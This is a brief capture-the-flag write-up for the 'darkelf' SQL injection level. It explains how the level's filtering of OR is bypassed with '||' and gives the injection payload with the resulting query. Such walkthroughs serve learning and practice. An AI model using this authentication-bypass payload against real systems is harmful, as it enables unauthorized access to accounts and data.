Skip to main content

darkelf

1

We are provided with the SQL query:

SELECT id FROM prob_darkelf WHERE id='guest' AND pw='{$_GET[pw]}'

This level prints out the flag if the id=admin.

However, it also removes the OR characters. In order to get around this, we need to use the double pipe (||) characters.

If we provide the following URI parameter:

?pw=' || id='admin

The resultant query becomes:

SELECT id FROM prob_darkelf WHERE id='guest' AND pw='' || id='admin'

2